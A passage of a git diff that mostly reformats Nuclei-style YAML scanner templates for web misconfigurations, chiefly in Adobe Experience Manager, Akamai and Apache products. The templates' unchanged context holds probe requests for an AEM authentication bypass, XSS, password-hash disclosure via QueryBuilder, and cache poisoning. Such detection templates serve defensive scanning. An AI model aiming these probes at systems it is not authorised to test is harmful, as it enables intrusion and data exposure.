matchers-condition: and matchers: - type: word diff --git a/http/miscellaneous/htaccess-config.yaml b/http/miscellaneous/htaccess-config.yaml index 4c2418ce89..b79e0806ee 100644 --- a/http/miscellaneous/htaccess-config.yaml +++ b/http/miscellaneous/htaccess-config.yaml @@ -4,9 +4,9 @@ info: name: HTaccess config file author: Yash Anand @yashanand155 severity: info - tags: misc,config metadata: max-request: 6 + tags: misc,config http: - method: GET diff --git a/http/miscellaneous/http-trace.yaml b/http/miscellaneous/http-trace.yaml index c84be6e2d8..cbe767de72 100644 --- a/http/miscellaneous/http-trace.yaml +++ b/http/miscellaneous/http-trace.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/ - tags: misc,generic metadata: max-request: 2 + tags: misc,generic http: - method: TRACE diff --git a/http/miscellaneous/joomla-htaccess.yaml b/http/miscellaneous/joomla-htaccess.yaml index 984ccadf1b..1b124be31d 100644 --- a/http/miscellaneous/joomla-htaccess.yaml +++ b/http/miscellaneous/joomla-htaccess.yaml @@ -5,9 +5,9 @@ info: author: oppsec severity: info description: Joomla! has an htaccess file to store configurations about HTTP config, directory listing, etc. - tags: misc,joomla metadata: max-request: 1 + tags: misc,joomla http: - method: GET diff --git a/http/miscellaneous/joomla-manifest-file.yaml b/http/miscellaneous/joomla-manifest-file.yaml index 54f747e30e..9cf8fb5742 100644 --- a/http/miscellaneous/joomla-manifest-file.yaml +++ b/http/miscellaneous/joomla-manifest-file.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: misc,joomla metadata: max-request: 1 + tags: misc,joomla http: - method: GET diff --git a/http/miscellaneous/moodle-changelog.yaml b/http/miscellaneous/moodle-changelog.yaml index 32cba5c7d6..280a1866f3 100644 --- a/http/miscellaneous/moodle-changelog.yaml +++ b/http/miscellaneous/moodle-changelog.yaml @@ -5,9 +5,9 @@ info: author: oppsec severity: info description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version. - tags: misc,moodle metadata: max-request: 1 + tags: misc,moodle http: - method: GET diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml index e040156aea..c654d568e5 100644 --- a/http/miscellaneous/netflix-conductor-version.yaml +++ b/http/miscellaneous/netflix-conductor-version.yaml @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/api/sys" stop-at-first-match: true + matchers-condition: and matchers: - type: status @@ -42,4 +43,4 @@ http: group: 1 regex: - 'conductor\-server\-([0-9.]+)\-' - - '"version":"([0-9.]+)\-' \ No newline at end of file + - '"version":"([0-9.]+)\-' diff --git a/http/miscellaneous/old-copyright.yaml b/http/miscellaneous/old-copyright.yaml index 37470c5927..73f2f13f33 100644 --- a/http/miscellaneous/old-copyright.yaml +++ b/http/miscellaneous/old-copyright.yaml @@ -5,8 +5,8 @@ info: author: geeknik severity: info metadata: - max-request: 1 verified: true + max-request: 1 tags: misc,generic http: @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/miscellaneous/options-method.yaml b/http/miscellaneous/options-method.yaml index e077c7834b..fa39bb6934 100644 --- a/http/miscellaneous/options-method.yaml +++ b/http/miscellaneous/options-method.yaml @@ -4,9 +4,9 @@ info: name: Allowed Options Method author: pdteam severity: info - tags: misc,generic metadata: max-request: 1 + tags: misc,generic http: - method: OPTIONS diff --git a/http/miscellaneous/rdap-whois.yaml b/http/miscellaneous/rdap-whois.yaml index c54bc51f8c..e05e7261cd 100644 --- a/http/miscellaneous/rdap-whois.yaml +++ b/http/miscellaneous/rdap-whois.yaml @@ -11,11 +11,11 @@ info: - https://about.rdap.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: whois,rdap,osint,misc http: @@ -25,7 +25,6 @@ http: redirects: true max-redirects: 3 - matchers: - type: status status: diff --git a/http/miscellaneous/robots-txt-endpoint.yaml b/http/miscellaneous/robots-txt-endpoint.yaml index 63937e1370..dc4e20b45d 100644 --- a/http/miscellaneous/robots-txt-endpoint.yaml +++ b/http/miscellaneous/robots-txt-endpoint.yaml @@ -4,9 +4,9 @@ info: name: robots.txt endpoint prober author: CasperGN,pdteam severity: info - tags: misc,generic metadata: max-request: 2 + tags: misc,generic http: - method: GET @@ -21,8 +21,8 @@ http: regex: - '(?m:\s(/[[:alpha:]]+[[:graph:]]+))' internal: true - iterate-all: true + matchers-condition: and matchers: - type: word diff --git a/http/miscellaneous/robots-txt.yaml b/http/miscellaneous/robots-txt.yaml index 2546dacd7a..9f4a28a28f 100644 --- a/http/miscellaneous/robots-txt.yaml +++ b/http/miscellaneous/robots-txt.yaml @@ -4,9 +4,9 @@ info: name: robots.txt file author: CasperGN,TheZakMan severity: info - tags: misc,generic metadata: max-request: 1 + tags: misc,generic http: - method: GET @@ -15,6 +15,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/miscellaneous/security-txt.yaml b/http/miscellaneous/security-txt.yaml index e5ee4e3a32..6c505896fb 100644 --- a/http/miscellaneous/security-txt.yaml +++ b/http/miscellaneous/security-txt.yaml @@ -22,6 +22,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: status diff --git a/http/miscellaneous/sitemap-detect.yaml b/http/miscellaneous/sitemap-detect.yaml index c38521d5b0..d8cdc20358 100644 --- a/http/miscellaneous/sitemap-detect.yaml +++ b/http/miscellaneous/sitemap-detect.yaml @@ -7,8 +7,8 @@ info: description: | A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. metadata: - max-request: 3 verified: true + max-request: 3 google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd tags: misc,generic,sitemap @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/sitemap.xsd" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/miscellaneous/spnego-detect.yaml b/http/miscellaneous/spnego-detect.yaml index 3c511cc9f0..791bde5ba1 100644 --- a/http/miscellaneous/spnego-detect.yaml +++ b/http/miscellaneous/spnego-detect.yaml @@ -10,9 +10,9 @@ info: - https://www.ibm.com/docs/en/was-liberty/core?topic=authentication-single-sign-http-requests-using-spnego-web - https://arstechnica.com/information-technology/2022/12/critical-windows-code-execution-vulnerability-went-undetected-until-now/ metadata: + verified: true max-request: 1 shodan-query: 'www-authenticate: negotiate' - verified: true tags: misc,windows,spnego http: @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 5 + matchers-condition: and matchers: - type: dsl diff --git a/http/miscellaneous/x-recruiting-header.yaml b/http/miscellaneous/x-recruiting-header.yaml index 36571fd356..3caee57bbe 100644 --- a/http/miscellaneous/x-recruiting-header.yaml +++ b/http/miscellaneous/x-recruiting-header.yaml @@ -8,8 +8,8 @@ info: reference: - https://webtechsurvey.com/response-header/x-recruiting metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "X-Recruiting:" tags: misc,hiring,jobs,employment,generic @@ -29,4 +29,4 @@ http: extractors: - type: dsl dsl: - - 'x_recruiting' \ No newline at end of file + - 'x_recruiting' diff --git a/http/miscellaneous/xml-schema-detect.yaml b/http/miscellaneous/xml-schema-detect.yaml index 6c05e36304..b6fcaeb8a3 100644 --- a/http/miscellaneous/xml-schema-detect.yaml +++ b/http/miscellaneous/xml-schema-detect.yaml @@ -4,9 +4,9 @@ info: name: XML Schema Detection author: alph4byt3 severity: info - tags: misc,generic metadata: max-request: 1 + tags: misc,generic http: - method: GET diff --git a/http/misconfiguration/ace-admin-dashboard.yaml b/http/misconfiguration/ace-admin-dashboard.yaml index 7b8d10793f..b371aa09a1 100644 --- a/http/misconfiguration/ace-admin-dashboard.yaml +++ b/http/misconfiguration/ace-admin-dashboard.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Dashboard - Ace Admin" tags: misconfig,exposure,aceadmin diff --git a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml index 4526db494b..b15f7e0b18 100644 --- a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml +++ b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure,packetstorm,misconfig metadata: max-request: 1 + tags: adobe,disclosure,packetstorm,misconfig http: - method: GET diff --git a/http/misconfiguration/adobe/adobe-connect-version.yaml b/http/misconfiguration/adobe/adobe-connect-version.yaml index 8347d77db0..ed7e135b84 100644 --- a/http/misconfiguration/adobe/adobe-connect-version.yaml +++ b/http/misconfiguration/adobe/adobe-connect-version.yaml @@ -4,9 +4,9 @@ info: name: Adobe Connect Central Version author: dhiyaneshDk severity: info - tags: adobe,misconfig metadata: max-request: 1 + tags: adobe,misconfig http: - method: GET diff --git a/http/misconfiguration/aem/aem-bg-servlet.yaml b/http/misconfiguration/aem/aem-bg-servlet.yaml index f93ce268f7..1c708967cf 100644 --- a/http/misconfiguration/aem/aem-bg-servlet.yaml +++ b/http/misconfiguration/aem/aem-bg-servlet.yaml @@ -24,4 +24,4 @@ http: - type: word words: - - '
Flushing output
' \ No newline at end of file + - '
Flushing output
' diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml index 363422a14c..0e30571d4c 100644 --- a/http/misconfiguration/aem/aem-cached-pages.yaml +++ b/http/misconfiguration/aem/aem-cached-pages.yaml @@ -15,6 +15,7 @@ http: - method: GET path: - "{{BaseURL}}/dispatcher/invalidate.cache" + headers: CQ-Handle: /content CQ-Path: /content diff --git a/http/misconfiguration/aem/aem-childrenlist-xss.yaml b/http/misconfiguration/aem/aem-childrenlist-xss.yaml index b850015db0..8fd44c2685 100644 --- a/http/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/http/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -11,8 +11,8 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-crx-bypass.yaml b/http/misconfiguration/aem/aem-crx-bypass.yaml index eb1e6109d8..47bb55abab 100644 --- a/http/misconfiguration/aem/aem-crx-bypass.yaml +++ b/http/misconfiguration/aem/aem-crx-bypass.yaml @@ -3,8 +3,8 @@ id: aem-crx-bypass info: name: AEM Package Manager - Authentication Bypass author: dhiyaneshDK - description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed. severity: critical + description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed. remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages." reference: - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ @@ -20,7 +20,6 @@ http: Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate - - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} diff --git a/http/misconfiguration/aem/aem-crx-search.yaml b/http/misconfiguration/aem/aem-crx-search.yaml index 72c2066ee0..34e5f094b0 100644 --- a/http/misconfiguration/aem/aem-crx-search.yaml +++ b/http/misconfiguration/aem/aem-crx-search.yaml @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/crx/explorer/ui/search.jsp?Path=&Query=" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-custom-script.yaml b/http/misconfiguration/aem/aem-custom-script.yaml index 0b8eb974db..93f108b29e 100644 --- a/http/misconfiguration/aem/aem-custom-script.yaml +++ b/http/misconfiguration/aem/aem-custom-script.yaml @@ -20,6 +20,7 @@ http: - "{{BaseURL}}{{path}}" iterate-all: true + extractors: - type: json part: body @@ -27,8 +28,8 @@ http: json: - '.[]' internal: true - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-debugging-libraries.yaml b/http/misconfiguration/aem/aem-debugging-libraries.yaml index 34862fcb10..39ea6ea313 100644 --- a/http/misconfiguration/aem/aem-debugging-libraries.yaml +++ b/http/misconfiguration/aem/aem-debugging-libraries.yaml @@ -8,8 +8,8 @@ info: - https://aem4beginner.blogspot.com/debugging-client-libraries - https://adobe-consulting-services.github.io/acs-aem-tools/features/dumplibs/index.html metadata: - max-request: 5 verified: true + max-request: 5 shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" diff --git a/http/misconfiguration/aem/aem-default-get-servlet.yaml b/http/misconfiguration/aem/aem-default-get-servlet.yaml index ba3d2aa778..8441a29e3c 100644 --- a/http/misconfiguration/aem/aem-default-get-servlet.yaml +++ b/http/misconfiguration/aem/aem-default-get-servlet.yaml @@ -82,6 +82,7 @@ http: - '{{BaseURL}}///etc.children.json/FNZ.ico' stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml index 628a753941..a768691f24 100644 --- a/http/misconfiguration/aem/aem-disk-usage.yaml +++ b/http/misconfiguration/aem/aem-disk-usage.yaml @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/etc/reports/diskusage.html?path=/content/dam" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-dump-contentnode.yaml b/http/misconfiguration/aem/aem-dump-contentnode.yaml index 77a4d4d577..ccafbbf107 100644 --- a/http/misconfiguration/aem/aem-dump-contentnode.yaml +++ b/http/misconfiguration/aem/aem-dump-contentnode.yaml @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/{{path}}" iterate-all: true + extractors: - type: json part: body @@ -27,8 +28,8 @@ http: json: - '.[]' internal: true - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-external-link-checker.yaml b/http/misconfiguration/aem/aem-external-link-checker.yaml index 316cb3e06b..06f89a8580 100644 --- a/http/misconfiguration/aem/aem-external-link-checker.yaml +++ b/http/misconfiguration/aem/aem-external-link-checker.yaml @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/var/linkchecker.html" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml index 0db1bcebcf..d9c64666ed 100644 --- a/http/misconfiguration/aem/aem-gql-servlet.yaml +++ b/http/misconfiguration/aem/aem-gql-servlet.yaml @@ -45,6 +45,7 @@ http: - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/aem/aem-groovyconsole.yaml b/http/misconfiguration/aem/aem-groovyconsole.yaml index 98511849fc..48768b2ee1 100644 --- a/http/misconfiguration/aem/aem-groovyconsole.yaml +++ b/http/misconfiguration/aem/aem-groovyconsole.yaml @@ -18,11 +18,12 @@ http: path: - "{{BaseURL}}/groovyconsole" - "{{BaseURL}}/etc/groovyconsole.html" + headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml index 4abc85a9d4..1938e240f7 100644 --- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -30,4 +30,4 @@ http: words: - '"success":true' - 'rep:password' - condition: and \ No newline at end of file + condition: and diff --git a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml index 4ea13fe428..e5730e45a5 100644 --- a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml @@ -28,4 +28,4 @@ http: words: - '"success":true' - 'jcr:uuid' - condition: and \ No newline at end of file + condition: and diff --git a/http/misconfiguration/aem/aem-login-status.yaml b/http/misconfiguration/aem/aem-login-status.yaml index 5af880a1e1..382a7a442f 100644 --- a/http/misconfiguration/aem/aem-login-status.yaml +++ b/http/misconfiguration/aem/aem-login-status.yaml @@ -21,6 +21,7 @@ http: - '{{BaseURL}}///system///sling///loginstatus' stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml index bee5558021..622aa40192 100644 --- a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml +++ b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml @@ -15,6 +15,7 @@ http: - method: GET path: - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/aem/aem-misc-admin.yaml b/http/misconfiguration/aem/aem-misc-admin.yaml index 5078301e8a..f78a1ae78f 100644 --- a/http/misconfiguration/aem/aem-misc-admin.yaml +++ b/http/misconfiguration/aem/aem-misc-admin.yaml @@ -7,8 +7,8 @@ info: reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: - max-request: 9 verified: true + max-request: 9 shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" @@ -28,6 +28,7 @@ http: - "{{BaseURL}}/miscadmin#/etc/msm/rolloutconfigs" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml index dd214075fb..9f9f65b96e 100644 --- a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml @@ -15,6 +15,7 @@ http: - method: GET path: - '{{BaseURL}}/bin/querybuilder.feed' + matchers-condition: and matchers: - type: status @@ -23,4 +24,4 @@ http: - type: word words: - - 'CQ Feed' \ No newline at end of file + - 'CQ Feed' diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index 1f47753d65..7645ff82be 100644 --- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -20,6 +20,7 @@ http: - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' stop-at-first-match: true + matchers-condition: and matchers: - type: status @@ -30,4 +31,4 @@ http: words: - 'jcr:path' - 'success' - condition: and \ No newline at end of file + condition: and diff --git a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml index bf4a37db57..0b58b3b7bf 100644 --- a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml @@ -26,6 +26,7 @@ http: - ' {{BaseURL}}///bin///querybuilder.feed.servlet' stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/aem/aem-secrets.yaml b/http/misconfiguration/aem/aem-secrets.yaml index 0eab636ffc..0d9c2417f6 100644 --- a/http/misconfiguration/aem/aem-secrets.yaml +++ b/http/misconfiguration/aem/aem-secrets.yaml @@ -4,13 +4,13 @@ info: name: AEM Secrets - Sensitive Information Disclosure author: boobooHQ,j3ssie severity: high - reference: - - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ description: | Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. + reference: + - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ metadata: - max-request: 2 verified: true + max-request: 2 tags: aem,adobe,misconfig,exposure http: @@ -22,8 +22,8 @@ http: headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-setpreferences-xss.yaml b/http/misconfiguration/aem/aem-setpreferences-xss.yaml index 6688fb113e..1c1b191bc2 100644 --- a/http/misconfiguration/aem/aem-setpreferences-xss.yaml +++ b/http/misconfiguration/aem/aem-setpreferences-xss.yaml @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-sling-userinfo.yaml b/http/misconfiguration/aem/aem-sling-userinfo.yaml index 5b804c10fc..61add63e92 100644 --- a/http/misconfiguration/aem/aem-sling-userinfo.yaml +++ b/http/misconfiguration/aem/aem-sling-userinfo.yaml @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/system/sling/info.sessionInfo.txt" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml index 678fafffef..60de00105e 100644 --- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -14,6 +14,7 @@ http: - method: GET path: - '{{BaseURL}}/libs/cq/security/userinfo.json' + matchers-condition: and matchers: - type: status diff --git a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml index b2c844c352..6123c4abba 100644 --- a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml +++ b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,intrusive http: - method: GET diff --git a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml index b9bd650256..6fd19f5104 100644 --- a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml +++ b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml @@ -9,15 +9,15 @@ info: reference: - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - https://cystack.net/en/plugins/cystack.remote.aem_childlist_selector_xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 metadata: max-request: 1 shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 tags: xss,aem,adobe,misconfig http: diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml index 912f9839d8..f03ed8c9d6 100644 --- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml +++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/admin/" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/akamai/akamai-arl-xss.yaml b/http/misconfiguration/akamai/akamai-arl-xss.yaml index fec3da45e7..9791e2e710 100644 --- a/http/misconfiguration/akamai/akamai-arl-xss.yaml +++ b/http/misconfiguration/akamai/akamai-arl-xss.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: akamai,xss,misconfig metadata: max-request: 1 + tags: akamai,xss,misconfig http: - method: GET diff --git a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml index bd62fc6c64..4c398f29c0 100644 --- a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml +++ b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -13,10 +13,9 @@ info: cvss-score: 7.1 cwe-id: CWE-44 metadata: - max-request: 204 verified: true + max-request: 204 tags: cache,poisoning,xss,akamai,s3,misconfig - variables: rand: "{{rand_base(5)}}" @@ -34,13 +33,12 @@ http: attack: clusterbomb payloads: escape: - - "\x0b" - - "\x0c" + - "\v" + - "\f" - "\x1c" - "\x1d" - "\x1e" - "\x1f" - bucket: - "nuclei-ap-northeast-1" - "nuclei-ap-northeast-2" @@ -59,7 +57,6 @@ http: - "nuclei-us-east-2" - "nuclei-us-west-1" - "nuclei-us-west-2" - stop-at-first-match: true unsafe: true matchers: diff --git a/http/misconfiguration/alibaba-mongoshake-unauth.yaml b/http/misconfiguration/alibaba-mongoshake-unauth.yaml index be12a07eec..90db71e848 100644 --- a/http/misconfiguration/alibaba-mongoshake-unauth.yaml +++ b/http/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -4,9 +4,9 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth,alibaba,misconfig metadata: max-request: 1 + tags: mongoshake,unauth,alibaba,misconfig http: - method: GET @@ -15,10 +15,10 @@ http: matchers-condition: and matchers: - - type: word words: - '{"Uri":"/worker","Method":"GET"}' + - type: word words: - 'text/plain' diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml index d5c8068cee..ce37223c3e 100644 --- a/http/misconfiguration/ampache-update-exposure.yaml +++ b/http/misconfiguration/ampache-update-exposure.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Ampache Update" tags: misconfig,ampache,exposure diff --git a/http/misconfiguration/ampps-dirlisting.yaml b/http/misconfiguration/ampps-dirlisting.yaml index c07dfe33cc..f20f583075 100644 --- a/http/misconfiguration/ampps-dirlisting.yaml +++ b/http/misconfiguration/ampps-dirlisting.yaml @@ -7,11 +7,11 @@ info: description: AMPPS by Softaculous panel directory listing was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,ampps,softaculous,misconfig metadata: max-request: 3 + tags: panel,ampps,softaculous,misconfig http: - method: GET @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml index 69c86b5874..580a7c2d7d 100644 --- a/http/misconfiguration/apache-drill-exposure.yaml +++ b/http/misconfiguration/apache-drill-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache Drill" tags: misconfig,exposure,apache,drill diff --git a/http/misconfiguration/apache-druid-unauth.yaml b/http/misconfiguration/apache-druid-unauth.yaml index 8e4f3cda61..0ba44220ec 100644 --- a/http/misconfiguration/apache-druid-unauth.yaml +++ b/http/misconfiguration/apache-druid-unauth.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache Druid" tags: misconfig,druid,unauth,apache @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: word words: - 'Apache Druid' diff --git a/http/misconfiguration/apache-impala.yaml b/http/misconfiguration/apache-impala.yaml index 834aa53d59..3c47e2317e 100644 --- a/http/misconfiguration/apache-impala.yaml +++ b/http/misconfiguration/apache-impala.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=627585602745296&set=pcb.627585619411961 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:587330928 tags: misconfig,apache,impala @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -30,4 +31,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml index db630a9676..20ac971cf8 100644 --- a/http/misconfiguration/apache-struts-showcase.yaml +++ b/http/misconfiguration/apache-struts-showcase.yaml @@ -7,8 +7,8 @@ info: reference: - 